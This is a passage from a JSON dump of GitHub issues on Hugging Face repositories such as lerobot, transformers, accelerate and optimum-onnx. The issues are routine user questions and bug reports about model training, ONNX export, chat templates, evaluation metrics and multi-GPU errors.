high)\nself.bijective = True\n```", "url": "https://github.com/huggingface/lerobot/issues/2108", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-02T21:44:22Z", "updated_at": "2025-10-07T20:36:31Z", "user": "priest-yang" }, { "repo": "huggingface/lerobot", "number": 2107, "title": "Low Success Rate When Training SmolVLA-0.24B on LIBERO", "body": "Hi folks, I'm trying to replicate the 0.24B SmolVLA model on the LIBERO dataset. Intuitively, I just changed the base model `vlm_model_name: str = \"HuggingFaceTB/SmolVLM2-256M-Video-Instruct\"`. Here is the command I used to train. \n\n`lerobot-train --policy.type=smolvla --policy.load_vlm_weights=true --dataset.repo_id=HuggingFaceVLA/libero --env.type=libero --env.task=libero_10 --output_dir=./outputs/ --steps=100000 --batch_size=64 --eval.batch_size=1 --eval.n_episodes=1 --eval_freq=1000 --wandb.enable=true`\n\nI trained on a single RTX4090. However, I found that the success rate on the eval set is quite low. The success rate was only 7.5%. Is there anything I did wrong? Attaching the training plots below. \n\n\"Image\"\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2107", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-02T19:11:55Z", "updated_at": "2025-12-20T09:30:58Z", "user": "zimgong" }, { "repo": "huggingface/optimum-onnx", "number": 66, "title": "How to export a stateless whisper model via optimum-cli?", "body": "I observe that when exporting a Whisper model via Python API, the resulting model is stateless, i.e. the decoder is split into two models.\n```python\nimport os\nfrom optimum.onnxruntime import ORTModelForSpeechSeq2Seq\nORTModelForSpeechSeq2Seq.from_pretrained(\"openai/whisper-tiny\", export=True).save_pretrained(\"./whisper/python\")\nprint(os.listdir(\"./whisper/python\"))\n# ['encoder_model.onnx', 'decoder_with_past_model.onnx', 'decoder_model.onnx', 'config.json', 'generation_config.json']\n```\n\nWhen I export this model via CLI, the decoder model is exported as stateful even if I provide the `--no-post-process` argument.\n```bash\noptimum-cli export onnx --task automatic-speech-recognition -m openai/whisper-tiny --no-post-process ./whisper/cli\nls ./whisper/cli\n\n# added_tokens.json decoder_model.onnx generation_config.json normalizer.json special_tokens_map.json tokenizer.json\n# config.json encoder_model.onnx merges.txt preprocessor_config.json tokenizer_config.json vocab.json\n```\n\nMy environment:\n```\ncertifi==2025.8.3\ncharset-normalizer==3.4.3\ncoloredlogs==15.0.1\nfilelock==3.19.1\nflatbuffers==25.9.23\nfsspec==2025.9.0\nhf-xet==1.1.10\nhuggingface-hub==0.35.3\nhumanfriendly==10.0\nidna==3.10\nJinja2==3.1.6\nMarkupSafe==3.0.3\nml_dtypes==0.5.3\nmpmath==1.3.0\nnetworkx==3.4.2\nnumpy==2.2.6\nnvidia-cublas-cu12==12.8.4.1\nnvidia-cuda-cupti-cu12==12.8.90\nnvidia-cuda-nvrtc-cu12==12.8.93\nnvidia-cuda-runtime-cu12==12.8.90\nnvidia-cudnn-cu12==9.10.2.21\nnvidia-cufft-cu12==11.3.3.83\nnvidia-cufile-cu12==1.13.1.3\nnvidia-curand-cu12==10.3.9.90\nnvidia-cusolver-cu12==11.7.3.90\nnvidia-cusparse-cu12==12.5.8.93\nnvidia-cusparselt-cu12==0.7.1\nnvidia-nccl-cu12==2.27.3\nnvidia-nvjitlink-cu12==12.8.93\nnvidia-nvtx-cu12==12.8.90\nonnx==1.19.0\nonnxruntime==1.23.0\noptimum @ git+https://github.com/huggingface/optimum@a813c95ac088c401547fe15e7a68ac5c6f00f9a7\noptimum-onnx @ git+https://github.com/huggingface/optimum-onnx.git@671b84f78a244594dd21cb1a8a1f7abb8961ea60\npackaging==25.0\nprotobuf==6.32.1\nPyYAML==6.0.3\nregex==2025.9.18\nrequests==2.32.5\nsafetensors==0.6.2\nsympy==1.14.0\ntokenizers==0.21.4\ntorch==2.8.0\ntqdm==4.67.1\ntransformers==4.55.4\ntriton==3.4.0\ntyping_extensions==4.15.0\nurllib3==2.5.0\n\n```\n\nHow to export this model as stateless via optimum-cli? Also, how to export this model as stateful via Python API?\n\nThanks!", "url": "https://github.com/huggingface/optimum-onnx/issues/66", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-02T09:50:03Z", "updated_at": "2025-10-13T05:33:25Z", "user": "nikita-savelyevv" }, { "repo": "huggingface/lerobot", "number": 2104, "title": "Select the VLM backbone for SmolVLA", "body": "Hi may I ask about the vlm_model_name, is there any model more powerful than HuggingFaceTB/SmolVLM2-500M-Video-Instruct which can be used to train SmolVLA for Lerobot SO101?", "url": "https://github.com/huggingface/lerobot/issues/2104", "state": "open", "labels": [ "question", "policies", "good first issue" ], "created_at": "2025-10-02T07:35:29Z", "updated_at": "2025-10-11T16:53:59Z", "user": "Llkhhb" }, { "repo": "huggingface/diffusers", "number": 12415, "title": "SVG 2 kernels", "body": "Can we support new sparse kernels in (Neurips 2025)\nhttps://svg-project.github.io/v2/", "url": "https://github.com/huggingface/diffusers/issues/12415", "state": "open", "labels": [], "created_at": "2025-10-01T10:52:50Z", "updated_at": "2025-10-01T10:52:50Z", "comments": 0, "user": "bhack" }, { "repo": "huggingface/lerobot", "number": 2096, "title": "How can I change the task name of already recorded episodes?", "body": "I recorded the dataset using:\n\n--dataset.single_task=\"slice the clay until it becomes 4 pieces\"\n\n\nNow I want to update those recorded episodes to a different task name. How can I do that?", "url": "https://github.com/huggingface/lerobot/issues/2096", "state": "open", "labels": [ "question", "dataset", "good first issue" ], "created_at": "2025-10-01T02:15:49Z", "updated_at": "2025-10-30T03:48:47Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/transformers", "number": 41235, "title": "i want to request a demo code for StatefulDataLoader , i want to use data checkpoint to recover the train stage`s data state, not only model state , how to use ,StatefulDataLoader or some code to reach it ?", "body": "i want to request a demo code for StatefulDataLoader , i want to use data checkpoint to recover the train stage`s data state, not only model state , how to use ,StatefulDataLoader or some code to reach it ?\n\nrecover data state ,not only model state , i wish i said my request clearly .\nhow to use accelerate + transformers trainer to train model ,when training is broken ,it can recover from data checkpoint and model checkpoint ? thanks\n\ni wish you understand what i said", "url": "https://github.com/huggingface/transformers/issues/41235", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-30T17:07:07Z", "updated_at": "2025-11-08T08:04:40Z", "user": "ldh127" }, { "repo": "huggingface/accelerate", "number": 3802, "title": "i want to request a demo code for StatefulDataLoader , i want to use data checkpoint to recover the train stage`s data state, not only model state , how to use ,StatefulDataLoader or some code to reach it ?", "body": "i want to request a demo code for StatefulDataLoader , i want to use data checkpoint to recover the train stage`s data state, not only model state , how to use ,StatefulDataLoader or some code to reach it ? \n\nrecover data state ,not only model state , i wish i said my request clearly .\nhow to use accelerate + transformers trainer to train model ,when training is broken ,it can recover from data checkpoint and model checkpoint ? thanks\n\ni wish you understand what i said \n", "url": "https://github.com/huggingface/accelerate/issues/3802", "state": "closed", "labels": [], "created_at": "2025-09-30T15:58:32Z", "updated_at": "2025-11-09T15:06:58Z", "user": "ldh127" }, { "repo": "huggingface/transformers", "number": 41211, "title": "Add DEIMv2", "body": "### Model description\n\nIt would be nice to integrate DEIMv2, a new state-of-the-art model for real-time object detection based on DINOv3. The weights are released under Apache 2.0.\n\nRelated thread: https://github.com/Intellindust-AI-Lab/DEIMv2/issues/20\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\nCode: https://github.com/Intellindust-AI-Lab/DEIMv2\nWeights (on Google Drive for now): https://github.com/Intellindust-AI-Lab/DEIMv2?tab=readme-ov-file#1-model-zoo\n\nIdeally, the [AutoBackbone API](https://huggingface.co/docs/transformers/main_classes/backbones) can be leveraged to not having to re-implement the entire DINOv3 backbone in `modular_deimv2.py` and `modeling_deimv2.py`. See an example of how this is leveraged for DETR [here](https://github.com/huggingface/transformers/blob/59035fd0e1876f9e526488b61fe43ff8829059f6/src/transformers/models/detr/modeling_detr.py#L280).", "url": "https://github.com/huggingface/transformers/issues/41211", "state": "open", "labels": [ "New model" ], "created_at": "2025-09-30T09:43:07Z", "updated_at": "2025-10-04T18:44:06Z", "comments": 4, "user": "NielsRogge" }, { "repo": "huggingface/transformers", "number": 41208, "title": "Integrate mamba SSM kernels from the hub", "body": "### Feature request\n\nCurrently, mamba kernels are imported via the main source package ex, for [GraniteMoeHybrid](https://github.com/huggingface/transformers/blob/main/src/transformers/models/granitemoehybrid/modeling_granitemoehybrid.py#L44-L46)\n\nCan we migrate this to use the kernels-hub (`kernels-community/mamba-ssm`) variation instead?\n\n### Motivation\n\nRemoves the external dependency. Kernel hub is also integrated at several other places throughout the library.\n\n### Your contribution\n\nI can submit a PR for migrating from the PyPi `mamba_ssm` package to the `kernels` package for mamba ops.", "url": "https://github.com/huggingface/transformers/issues/41208", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-09-30T07:50:52Z", "updated_at": "2025-12-18T10:17:06Z", "comments": 15, "user": "romitjain" }, { "repo": "huggingface/tokenizers", "number": 1870, "title": "How can I convert a trained tokenizer into `transformers` format", "body": "Hi guys,\n\nI have trained a tokenizer which works pretty well and it is stored in a single `.json` file. Is there any method / API to convert it into a `transformers` toeknizer format?\n\nIf there's no such implementation I am happy to contribute.", "url": "https://github.com/huggingface/tokenizers/issues/1870", "state": "closed", "labels": [], "created_at": "2025-09-30T06:09:52Z", "updated_at": "2025-09-30T13:53:53Z", "comments": 1, "user": "dibbla" }, { "repo": "huggingface/lighteval", "number": 999, "title": "How to print all pass@k scores when generating 16 samples?", "body": "Hi,\n\nI want to print all results of pass@k metrics when generating 16 samples. (e.g., k=1, 2, 4, 8, 16)\n\n```python\n\nmath_500_pass_k_at_16 = LightevalTaskConfig(\n name=\"math_500_pass_k_at_16\",\n suite=[\"custom\"],\n prompt_function=math_500_prompt_fn,\n hf_repo=\"HuggingFaceH4/MATH-500\",\n hf_subset=\"default\",\n hf_avail_splits=[\"test\"],\n evaluation_splits=[\"test\"],\n few_shots_split=None,\n few_shots_select=None,\n generation_size=32768,\n metrics=[\n Metrics.pass_at_k_math(sample_params={\"k\": 1, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 2, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 4, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 8, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 16, \"n\": 16}),\n ],\n version=2,\n```\n\nBut, I can't see full results that I want. Does anyone know how to resolve it?\n", "url": "https://github.com/huggingface/lighteval/issues/999", "state": "open", "labels": [], "created_at": "2025-09-29T21:49:44Z", "updated_at": "2025-10-14T08:04:17Z", "user": "passing2961" }, { "repo": "huggingface/lerobot", "number": 2083, "title": "How to train this RL model with my trained data", "body": "I want this model to load the trained model that I have already generated. So, I modified the output_dir and set resume to true, but then the problem shown in the figure occurred. How can I solve it?\n`{ \"output_dir\": \"outputs/train/2025-09-28/17-28-55_default\", \n\"job_name\": \"default\", \"resume\": true, \n\"seed\": 1000, \"num_workers\": 4, \n\"batch_size\": 256, \n\"steps\": 100000,`\n\nand the origin code is :\n`{ \"output_dir\": null, \n\"job_name\": \"default\", \"resume\": flase, \n\"seed\": 1000, \"num_workers\": 4, \n\"batch_size\": 256, \n\"steps\": 100000,\n`[\n\n\"Image\"\n\n](url)", "url": "https://github.com/huggingface/lerobot/issues/2083", "state": "open", "labels": [], "created_at": "2025-09-29T07:22:08Z", "updated_at": "2025-10-07T20:32:04Z", "user": "993984583" }, { "repo": "huggingface/lerobot", "number": 2082, "title": "How to train this RL model with my model data", "body": "I want this model to load the trained model that I have already generated. So, I modified the output_dir and set resume to true, but then the problem shown in the figure occurred. How can I solve it?\n`{\n \"output_dir\": \"outputs/train/2025-09-28/17-28-55_default\",\n \"job_name\": \"default\",\n \"resume\": true,\n \"seed\": 1000,\n \"num_workers\": 4,\n \"batch_size\": 256,\n \"steps\": 100000,`[\n\n\"Image\"\n\n](url)", "url": "https://github.com/huggingface/lerobot/issues/2082", "state": "closed", "labels": [], "created_at": "2025-09-29T07:18:52Z", "updated_at": "2025-10-07T20:33:11Z", "user": "993984583" }, { "repo": "huggingface/sentence-transformers", "number": 3532, "title": "What is the proper way to use prompts? Do we have to format/render them ourselves?", "body": "Hi. First time using the Sentence Transformers library and I had a question regarding using prompts. Specifically, it seems like the [`SentenceTransformer.encode_document`](https://sbert.net/docs/package_reference/sentence_transformer/SentenceTransformer.html#sentence_transformers.SentenceTransformer.encode_document) method is a convenient wrapper for the [`SentenceTransformer.encode`](https://sbert.net/docs/package_reference/sentence_transformer/SentenceTransformer.html#sentence_transformers.SentenceTransformer.encode) method in the sense that the prompt `\"document\"` and the task `\"document\"` are selected automatically.\n\nHowever, I'm noticing that the prompt is simply prepended to the provided text rather than having it be formatted. The prompt for `\"document\"` is `title: {title | \"none\"} | text: {content}` and inside the `encode` method simply prepends it: https://github.com/UKPLab/sentence-transformers/blob/7341bf155b4349b88690b78c84beb5aa658c439f/sentence_transformers/SentenceTransformer.py#L1040\n\nMeaning that the resulting input to the embedding model would look like `title: none | text: {OUR_TEXT}`. But what if we wanted to include a `title` value? It seems like we'd have to pre-process the input ourselves. But then what is the point of using `encode_document`?", "url": "https://github.com/huggingface/sentence-transformers/issues/3532", "state": "closed", "labels": [], "created_at": "2025-09-28T06:32:51Z", "updated_at": "2025-09-30T10:59:24Z", "user": "seanswyi" }, { "repo": "huggingface/transformers", "number": 41186, "title": "Qwen2.5-VL restore tensor multi-image form", "body": "\nHello, I have recently been experimenting with qwen2.5-vl (https://github.com/huggingface/transformers/blob/v4.52-release/src/transformers/models/qwen2_5_vl/modeling_qwen2_5_vl.py). I noticed that multiple images are pre-merged here,\n```\nimage_embeds = self.get_image_features(pixel_values, image_grid_thw)\n```\n but I want to process each image individually, such as performing pooling on each image. I found that when I attempt operations like \n```\nimage_embeds.view(n_img, image_embeds.shape[0]//n_img, -1)\n```\n I cannot correctly restore the multi-image format. Could you please advise on how to handle this? \n", "url": "https://github.com/huggingface/transformers/issues/41186", "state": "closed", "labels": [], "created_at": "2025-09-28T03:36:24Z", "updated_at": "2025-11-05T08:02:55Z", "comments": 2, "user": "NiFangBaAGe" }, { "repo": "huggingface/peft", "number": 2802, "title": "Guide on training that requires both LoRA and base model forward calls ?", "body": "Hi, I'm working on some training variants that require hidden states from the base model and the hidden states produced with LoRA. I'm currently initializing two separate model objects:\n```\n from peft import get_peft_model\n m1=AutoModelForCausalLM.from_pretrained(model_path)\n m2=AutoModelForCausalLM.from_pretrained(model_path)\n lora_config = LoraConfig(....)\n m2 = get_peft_model(m2, lora_config)\n```\n\nIs there already an api to call non-lora forward with `m2` object ? I believe it'll be more memory efficient.", "url": "https://github.com/huggingface/peft/issues/2802", "state": "closed", "labels": [], "created_at": "2025-09-27T23:12:23Z", "updated_at": "2025-10-15T10:26:15Z", "comments": 3, "user": "thangld201" }, { "repo": "huggingface/lerobot", "number": 2072, "title": "How to run lerobot with RTX 5090? If not possible, please add support", "body": "### System Info\n\n```Shell\n- lerobot version: 0.3.4\n- Platform: Linux-6.14.0-32-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface Hub version: 0.35.1\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.8.0+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA GeForce RTX 5090\n- Using GPU in script?: Yes\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI am trying to run the train script as shown in the examples\n\n```\npython -m lerobot.scripts.lerobot_train --policy.path=cijerezg/smolvla-test --dataset.repo_id=cijerezg/pick-up-train-v1 --batch_size=48 --steps=20000 --output_dir=outputs/train/my_smolvla_pickup_v9 --job_name=my_smolvla_training --policy.device=cuda --wandb.enable=true --policy.repo_id=pickup_policy_v5 --save_freq=1000\n```\n\n### Expected behavior\n\nI expect it to run, but instead I get the following error: \n\n```\nTraceback (most recent call last):\n File \"\", line 198, in _run_module_as_main\n File \"\", line 88, in _run_code\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 363, in \n main()\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 359, in main\n train()\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 263, in train\n batch = next(dl_iter)\n ^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/utils.py\", line 917, in cycle\n yield next(iterator)\n ^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 734, in __next__\n data = self._next_data()\n ^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1516, in _next_data\n return self._process_data(data, worker_id)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1551, in _process_data\n data.reraise()\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/_utils.py\", line 769, in reraise\n raise exception\nNotImplementedError: Caught NotImplementedError in DataLoader worker process 0.\nOriginal Traceback (most recent call last):\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n ^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n ~~~~~~~~~~~~^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 874, in __getitem__\n video_frames = self._query_videos(query_timestamps, ep_idx)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 846, in _query_videos\n frames = decode_video_frames(video_path, shifted_query_ts, self.tolerance_s, self.video_backend)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 69, in decode_video_frames\n return decode_video_frames_torchcodec(video_path, timestamps, tolerance_s)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 248, in decode_video_frames_torchcodec\n decoder = decoder_cache.get_decoder(str(video_path))\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/datasets/video_utils.py\", line 193, in get_decoder\n decoder = VideoDecoder(file_handle, seek_mode=\"approximate\")\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/RL/LeRobot/.venv/lib/python3.12/site-packages/torchcodec/decoders/_video_decoder.py\", line 89, in __init__\n self._decoder = create_decoder(source=source, seek_mode=seek_mode)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/Documents/Research/", "url": "https://github.com/huggingface/lerobot/issues/2072", "state": "closed", "labels": [], "created_at": "2025-09-27T19:52:42Z", "updated_at": "2025-11-08T07:53:00Z", "user": "cijerezg" }, { "repo": "huggingface/text-generation-inference", "number": 3333, "title": "How to use prefix caching", "body": "Hi\nI can't find a way to turn on the prefix caching\n\nWhen I run any model, I always get:\nUsing prefix caching = False\n\nThanks a lot", "url": "https://github.com/huggingface/text-generation-inference/issues/3333", "state": "open", "labels": [], "created_at": "2025-09-27T14:14:37Z", "updated_at": "2025-09-29T11:52:48Z", "user": "Noha-Magdy" }, { "repo": "huggingface/smol-course", "number": 259, "title": "[QUESTION] Is this a bug in smollmv3's chat template?", "body": "\nHi \n\nI am reading this \nhttps://huggingface.co/learn/smol-course/unit1/2#chat-templates-with-tools\n\nI feel like there is a bug in `HuggingFaceTB/SmolLM3-3B` 's chat template\n\nfrom the example\n\n```\n# Conversation with tool usage\nmessages = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant with access to tools.\"},\n {\"role\": \"user\", \"content\": \"What's the weather like in Paris?\"},\n {\n \"role\": \"assistant\", \n \"content\": \"I'll check the weather in Paris for you.\",\n \"tool_calls\": [\n {\n \"id\": \"call_1\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": '{\"location\": \"Paris, France\", \"unit\": \"celsius\"}'\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_1\", \n \"content\": '{\"temperature\": 22, \"condition\": \"sunny\", \"humidity\": 60}'\n },\n {\n \"role\": \"assistant\",\n \"content\": \"The weather in Paris is currently sunny with a temperature of 22\u00b0C and 60% humidity. It's a beautiful day!\"\n }\n]\n\n# Apply chat template with tools\nformatted_with_tools = tokenizer.apply_chat_template(\n messages,\n tools=tools,\n tokenize=False,\n add_generation_prompt=False\n)\n\nprint(\"Chat template with tools:\")\nprint(formatted_with_tools)\n```\n\n\nI got this result\n\n```\nChat template with tools:\n<|im_start|>system\n## Metadata\n\nKnowledge Cutoff Date: June 2025\nToday Date: 27 September 2025\nReasoning Mode: /think\n\n## Custom Instructions\n\nYou are a helpful assistant with access to tools.\n\n### Tools\n\nYou may call one or more functions to assist with the user query.\nYou are provided with function signatures within XML tags:\n\n\n{'type': 'function', 'function': {'name': 'get_weather', 'description': 'Get the current weather for a location', 'parameters': {'type': 'object', 'properties': {'location': {'type': 'string', 'description': 'The city and state, e.g. San Francisco, CA'}, 'unit': {'type': 'string', 'enum': ['celsius', 'fahrenheit'], 'description': 'The temperature unit'}}, 'required': ['location']}}}\n{'type': 'function', 'function': {'name': 'calculate', 'description': 'Perform mathematical calculations', 'parameters': {'type': 'object', 'properties': {'expression': {'type': 'string', 'description': 'Mathematical expression to evaluate'}}, 'required': ['expression']}}}\n\n\nFor each function call, return a json object with function name and arguments within XML tags:\n\n{\"name\": , \"arguments\": }\n\n\n<|im_end|>\n<|im_start|>user\nWhat's the weather like in Paris?<|im_end|>\n<|im_start|>assistant\nI'll check the weather in Paris for you.<|im_end|>\n<|im_start|>user\n{\"temperature\": 22, \"condition\": \"sunny\", \"humidity\": 60}<|im_end|>\n<|im_start|>assistant\nThe weather in Paris is currently sunny with a temperature of 22\u00b0C and 60% humidity. It's a beautiful day!<|im_end|>\n\n```\n\nWhich is kind of weird.\nThe first thing is there is no tool call in below message\n```\n<|im_start|>assistant\nI'll check the weather in Paris for you.<|im_end|>\n```\n\nI expect it to have ` ... ` in it.\n\nthe second thing is why the `tool` role got replace with `user` role.\nShould not we explicitly specify the role?\n\nCan someone help me with this, please?", "url": "https://github.com/huggingface/smol-course/issues/259", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-27T10:19:37Z", "updated_at": "2025-11-24T18:40:09Z", "user": "Nevermetyou65" }, { "repo": "huggingface/accelerate", "number": 3797, "title": "Question: ReduceLROnPlateau wrapped by AcceleratedScheduler in DDP may multiply LR by num_processes?", "body": "Hi,\n\nI\u2019m using ReduceLROnPlateau wrapped by AcceleratedScheduler in a multi-GPU / DDP setup (num_processes=8).\n\nMy main process calls:\n```\nlr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, mode=\"min\", factor=self.hyper_params['lr_decay_factor'], patience=self.hyper_params['lr_reduce_patient']\n)\nmodel, optimizer, train_loader, val_loader, lr_scheduler, = accelerator.prepare(\n model_bundle.model, optimizer, data_loaders.train_loader, data_loaders.val_loader, lr_scheduler\n)\nfor epoch in range(self.hyper_params['epochs']):\n # train...\n val_loss = self.eval()\n lr_scheduler.step(val_loss)\n\n```\nI noticed that AcceleratedScheduler.step() does:\n```\nnum_processes = AcceleratorState().num_processes\nfor _ in range(num_processes):\n # Special case when using OneCycle and `drop_last` was not used\n if hasattr(self.scheduler, \"total_steps\"):\n if self.scheduler._step_count <= self.scheduler.total_steps:\n self.scheduler.step(*args, **kwargs)\n else:\n self.scheduler.step(*args, **kwargs)\n```\nWill this cause the LR to be reduced num_processes times for a single validation step?\n\nThanks!", "url": "https://github.com/huggingface/accelerate/issues/3797", "state": "closed", "labels": [], "created_at": "2025-09-26T10:02:20Z", "updated_at": "2025-11-03T15:08:09Z", "comments": 1, "user": "nicelulu" }, { "repo": "huggingface/lerobot", "number": 2050, "title": "I wonder how to use RL on so101 within sim environment?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2050", "state": "closed", "labels": [ "question", "simulation", "good first issue" ], "created_at": "2025-09-26T06:52:38Z", "updated_at": "2025-10-08T18:04:44Z", "user": "Temmp1e" }, { "repo": "huggingface/lerobot", "number": 2045, "title": "I would appreciate it if you could explain how to train the slicing clay model", "body": "I am planning to conduct a clay-cutting task using pi0. Since this type of task is not typically included among pi0\u2019s foundation model tasks, I would like to inquire how many episodes (and the approximate duration of each) would generally be required for such a custom task.\n\nThe task I have in mind involves cutting clay in this manner, and I am uncertain whether it can be made to work effectively. I would greatly appreciate any realistic advice or guidance you could provide on this matter.\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2045", "state": "open", "labels": [], "created_at": "2025-09-26T00:51:59Z", "updated_at": "2025-09-26T00:51:59Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/lerobot", "number": 2042, "title": "Question: How to train to get Task Recovery behavior?", "body": "We would need the robot to be able to detect a failure (like dropping an object) and attempt to correct it to continue with the task.\n\nHow would the training data would look like for this?\n\nThanks", "url": "https://github.com/huggingface/lerobot/issues/2042", "state": "open", "labels": [], "created_at": "2025-09-25T15:52:55Z", "updated_at": "2025-09-25T15:52:55Z", "user": "raul-machine-learning" }, { "repo": "huggingface/accelerate", "number": 3794, "title": "Error when evaluating with multi-gpu", "body": "I met a problem when evaluating Llada-8B with multi-gpu ( **Nvidia V100** ) using accelerate+lm_eval. Error occurs when **num_processes>1**.\nbut there is no problem with single GPU, all the other cfgs are the same.\nHow can i solve this problem?\nI use this command to evaluate\n\n accelerate launch --config_file config1.yaml eval_llada.py --tasks ${task} --num_fewshot ${num_fewshot} \\\n --confirm_run_unsafe_code --model llada_dist \\\n --model_args model_path='/raid/data/zhouy/model_data/LLaDA-8B-Instruct', \n gen_length=${length},steps=${length},block_length=${block_length},show_speed=True \n\nThis is my config1.yaml\n\n compute_environment: LOCAL_MACHINE \n debug: false\n distributed_type: MULTI_GPU\n downcast_bf16: 'no'\n enable_cpu_affinity: false\n machine_rank: 0\n main_process_ip: null\n main_process_port: 5678\n main_training_function: main\n mixed_precision: fp16\n num_machines: 1\n num_processes: 2\n rdzv_backend: static\n same_network: true\n tpu_env: []\n tpu_use_cluster: false\n tpu_use_sudo: false\n use_cpu: false\n\nHere is the Error logs:\n\n [rank1]: Traceback (most recent call last):\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/eval_llada.py\", line 364, in \n [rank1]: cli_evaluate()\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/__main__.py\", line 389, in cli_evaluate\n [rank1]: results = evaluator.simple_evaluate(\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/utils.py\", line 422, in _wrapper\n [rank1]: return fn(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/evaluator.py\", line 308, in simple_evaluate\n [rank1]: results = evaluate(\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/utils.py\", line 422, in _wrapper\n [rank1]: return fn(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/lm_eval/evaluator.py\", line 528, in evaluate\n [rank1]: resps = getattr(lm, reqtype)(cloned_reqs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/eval_llada.py\", line 312, in generate_until\n [rank1]: generated_answer, nfe = generate_with_dual_cache(self.model, input_ids, steps=self.steps, gen_length=self.gen_length, block_length=self.block_length, \n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n [rank1]: return func(*args, **kwargs)\n [rank1]: File \"/home/zhouy/dllm/Fast-dLLM-main/llada/generate.py\", line 208, in generate_with_dual_cache\n [rank1]: output = model(x, use_cache=True)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n [rank1]: return self._call_impl(*args, **kwargs)\n [rank1]: File \"/raid/data/zhouy/anaconda3/envs/dllm/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n [rank1]: return forward_call(*args, **kwargs)\n 